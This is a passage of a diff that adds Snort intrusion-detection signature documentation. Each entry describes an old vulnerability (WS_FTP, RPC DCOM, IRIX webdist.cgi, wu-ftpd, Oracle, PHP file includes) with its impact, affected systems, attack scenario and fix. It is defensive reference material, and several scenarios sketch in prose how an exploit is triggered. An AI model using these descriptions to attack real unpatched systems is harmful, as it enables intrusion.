+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/1379.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1379
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with IPSWITCH WS_FTP server for 
+Windows hosts.
+
+--
+Impact:
+Remote administrator access.  A successful attack can allow remote 
+execution of arbitrary commands with privileges of administrator.
+
+--
+Detailed Information:
+A buffer overflow exists in WS_FTP server that may permit the execution 
+of arbitrary commands with the privileges of administrator.  The exploit
+can be generated by FTP client sending a STAT command accompanied by an 
+argument greater than 479 bytes long.  This exploit requires login 
+access to the FTP server.
+
+--
+Affected Systems:
+Hosts running WS_FTP server 2.0.3.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable WS_FTP server and supply an overly
+long file argument to cause a buffer overflow, allowing execution of 
+arbitrary commands with the privileges of administrator.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Security Focus:
+http://www.securityfocus.com/advisories/3641
+
+--
--- /dev/null
+++ b/doc/signatures/3175.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3175
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1163.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+Sid:
+1163
+
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Web server running on an IRIX platform.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+IRIX versions 5.0 through 6.3 contain a CGI script (/var/www/cgi-bin/webdist.cgi) 
+for remote administration purposes. This script, as originally released by 
+SGI, contains a vulnerability that can allow an attacker to run any 
+arbitrary command that the web server user has access to.
+
+--
+Affected Systems:
+	IRIX systems 5.0 to 6.3
+
+--
+Attack Scenarios:
+An attacker makes a request for the script followed by a semi-colon
+character ";" and then the command to be executed.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of this script on the server.
+
+Check for further signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1841.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1841
+
+--
+Summary:
+This event is generated when a client on the protected network has 
+possibly visited a website containing malicious javascript code.
+
+--
+Impact:
+Minimal
+
+--
+Detailed Information:
+Certain versions of Mozilla and Netscape may allow script code to access
+local cookie data.
+
+By accessing a maliciously coded webpage, a users cookie data from any 
+domain may be viewed by the website's administrator.
+
+--
+Affected Systems:
+	Mozilla versions prior to 1.0.1
+	Netscape versions prior to 6.2.1 
+
+--
+Attack Scenarios:
+A devious website admin creates a webpage with malicious code and 
+obtains sensitive cookie data from a visiting user's web browser about 
+any domain he wishes.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+Some peer-to-peer applications may cause this rule to generate an event.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5293
+
+--
--- /dev/null
+++ b/doc/signatures/2356.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2356
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application WebChat.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+WebChat contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable
+WEBCHATPATH when making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file db_mysql.php.
+
+--
+Affected Systems:
+	Webdev Webchat 0.77
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the WEBCHATPATH variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/348.txt
@@ -0,0 +1,61 @@
+SID:
+348
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+This rule detects code from a published exploit called bobek.c
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2282.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2282
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000732.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000732
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "EditIPofURL.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "EditIPofURL.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2416.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+2416
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2581.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2581
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory
+traversal associated with the Crystal Reports web viewer.
+
+--
+Impact:
+A successful attack may allow unauthorized files to be viewed or
+possibly deleted.
+
+--
+Detailed Information:
+A vulnerability exists in the Crystal Reports web viewer that may permit
+an attacker to view or delete unauthorized files.  The is due to a
+failure to ensure that that a requested Crystal Report file location
+is in the web root directory, permitting unauthorized files to be
+viewed.
+
+In addition, Crystal Reports assumes that the requested report
+file for viewing is a temporary file and deletes it after the
+web version has been viewed.  This problem combined with the
+directory traversal vulnerability may allow sensitive or valuable
+files to be deleted.
+
+--
+Affected Systems:
+Crystal Reports 8.5 JAVA SDK
+Crystal Reports RAS 8.5 for UNIX
+Crystal Reports 9.0
+Crystal Enterprise 9.0
+Crystal Reports 10
+Crystal Reports 10.0
+
+--
+Attack Scenarios:
+An attacker can request to view a file not in the web root
+directory, permitting unauthorized information disclosure.
+The viewed file will be deleted subsequently possibly causing
+harm to the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0204
+
+Other:
+http://www.microsoft.com/security/bulletins/200406_crystal.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/568.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+568
+
+--
+Summary:
+This event is generated when an attempt is made to change the message on
+the LCD display on a JetDirect enabled HP printer.
+
+--
+Impact:
+User confusion and comedy, mostly.
+
+--
+Detailed Information:
+HP JetDirect printers allow remote machines to change the message that
+is displayed on the LCD panel via the PJL command. This event indicates
+that this command has been used in network traffic.
+
+--
+Affected Systems:
+	HP JetDirect enabled printers
+ 
+--
+Attack Scenarios:
+As part of an attempt to confuse and annoy users, an attacker may
+attempt to change the message displayed on the printers LCD screen.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to the latest JetDirect, and investigate the possibility of
+restricting access to a central print-server using the "allow: <ip>
+<netmask>" directive in a printer config file. 
+
+Disallow printer use from hosts outside the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2410.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2410
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2196.txt
@@ -0,0 +1,55 @@
+Rule:  
+
+--
+Sid:
+2196
+
+--
+Summary:
+This event is generated when an attempt is made to access catgy.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Aktivate e-commerce software.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+Aktivate 1.03 is an e-commerce application for use on Linux and other UNIX-based operating systems. An attacker can craft a URL with malicious code in the "desc" command's argument that passes the commands to catgy.cgi. If a legitimate user activates the URL, malicious code may be executed on the client computer.   
+
+--
+Affected Systems:
+Systems running Aktivate 1.03.
+
+--
+Attack Scenarios:
+An attacker may craft a URL that, when activated by a legitimate user, obtains the user's session cookie, thereby allowing the attacker to pose as the user for the duration of the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses catgy.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been fixed. Contact the vendor, Allen & Keul Web Solutions (http://www.allen-keul.net) for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+http://www.securityfocus.com/bid/3714
+
+--
--- /dev/null
+++ b/doc/signatures/2016.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2016
+
+--
+Summary:
+Remote Procedure Call (RPC) is a facility that enables a machine to 
+request a service from another remote machine. This is done without the 
+request for available services on a host.
+
+--
+Impact:
+This may be an intelligence gathering activity that could be the prelude
+to an attack against a vulnerable service on the host.
+
+--
+Detailed Information:
+This RPC status request returns information pertaining to available RPC 
+services running on a host. This is not an attack against a host by 
+itself but may be an intelligence gathering activity in prelude to an 
+attack against a vulnerable service running on a target host.
+
+--
+Affected Systems:
+All machines running RPC services.
+
+--
+Attack Scenarios:
+The attacker merely needs to request information about services being 
+offered on a target machine using "rpcinfo" for example.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+When seen on a local area network a legitimate rpcinfo request will 
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+Disable all RPC services where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats:
+http://www.whitehats.com/info/IDS15/
+
+--
--- /dev/null
+++ b/doc/signatures/100000132.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid: 
+100000132
+
+-- 
+Summary: 
+This event is generated when a connection is made to the Internet via a proxy 
+server on your internal network. 
+
+-- 
+
+Impact: 
+If the server is not legitimate, anyone with access to it can use your 
+bandwidth to access the Internet; if users conduct malicious activity on the 
+Internet through this server, the activity will appear to have come from the 
+misconfigured machine.
+
+--
+Detailed Information:
+This rule looks for pieces of HTTP requests being made by a misconfigured 
+Squid, ISA, or NetCache proxy server. If it fires, and the machine the alert is 
+coming from is not a known proxy server, it indicates that the machine in 
+question is either improperly configured or has been compromised.
+
+False positives associated with this rule may be reduced considerably, or even 
+eliminated, by the use of a custom variable. By editing your snort.conf to 
+include "var KNOWN_PROXY_SERVERS = [<list of valid servers]" and modifying the 
+rule to read "alert tcp !$KNOWN_PROXY_SERVERS", all proxy activity associated 
+with these machines will be ignored.
+
+--
+Affected Systems:
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Enforce access restrictions if this is a legitimate proxy server that is being 
+abused; remove the server from machines on which there was no legitimate 
+installation, and search for other signs of system compromise.
+
+--
+Contributors: 
+Alexandru Ionica <gremlin@networked.ro>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1060.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1060
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/2202.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2202
+
+--
+Summary:
+This event is generated when an attempt is made to access edit_action.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal vulnerability in Webmin 0.91.
+
+--
+Impact:
+Information gathering, possible execution of system utilities to which Webmin has rights.
+
+--
+Detailed Information:
+Webmin is a web-based system administration tool for Linux and UNIX-based operating systems. A malicious user could use directory traversal techniques within an argument sent to the edit_action.cgi script in order to view hidden files on the server or execute programs to which Webmin has security privileges. 
+
+--
+Affected Systems:
+Systems running Webmin 0.91.
+
+--
+Attack Scenarios:
+An attacker creates a specially crafted an edit_action.cgi URL and transmits it to a vulnerable server. The attacker can then view or execute any arbitrary file included in the parameter, provided that Webmin has rights to access it. 
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses edit_action.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Webmin 0.92 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/3698
+
+--
--- /dev/null
+++ b/doc/signatures/2254.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+2254
+
+--
+Summary:
+This rule has been deleted in favor of sid 2253.
+
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Exchange Server.
+
+--
+Impact:
+Serious. Possible execution of arbitrary code and Denial of Service
+(DoS).
+
+--
+Detailed Information:
+A vulnerability exists in versions of Microsoft Exchange Server such
+that it is possible for an attacker to execute arbitrary code or cause a
+DoS condition on the server without the need for prior authentication as
+a valid user.
+
+It is possible for an attacker to connect to the Exchange server on port
+25 and send an extended verb request to the server that will cause a
+large amount of memory to be allocated. In Exchange Server 5.5 this may
+cause a DoS, whilst in Exchange Server 2000 this same condition could
+present the attacker with an opportunity to execute arbitrary code.
+
+--
+Affected Systems:
+	MIcrosoft Exchange Server 5.5
+	Microsoft Exchange Server 2000
+
+--
+Attack Scenarios:
+The attacker can connect to port 25 of the server and send a specially
+crafted verb request.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft Corp.
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-046.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0714
+
+--
--- /dev/null
+++ b/doc/signatures/2609.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2609
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "cancel_statistics" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
--- /dev/null
+++ b/doc/signatures/1905.txt
@@ -0,0 +1,68 @@
+Rule:
+--
+Sid:
+1905
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) amd service.
+
+--
+Impact:
+Remote root access. This attack can permit execution of arbitrary
+commands with the privileges of the user running amd, typically root.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts. The
+amd service automatically mounts and unmounts requested file systems.
+There is a buffer overflow associated with amd logging that can allow
+execution of arbitrary commands with the privileges of the user running
+amd, typically root.
+
+--
+Affected Systems:
+	BSDI BSD/OS 3.1, 4.0.1
+	FreeBSD 3.0, 3.1, 3.2
+	Red Hat Linux 4.2, 5.0, 5.1, 5.2, 6.0
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where amd runs
+and then attack the amd port. Alternatively, an attacker may attempt to
+execute the exploit code on any listening port in the RPC range if the
+portmapper is blocked. 
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2828.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2828
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repgroup
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2190.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2190
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
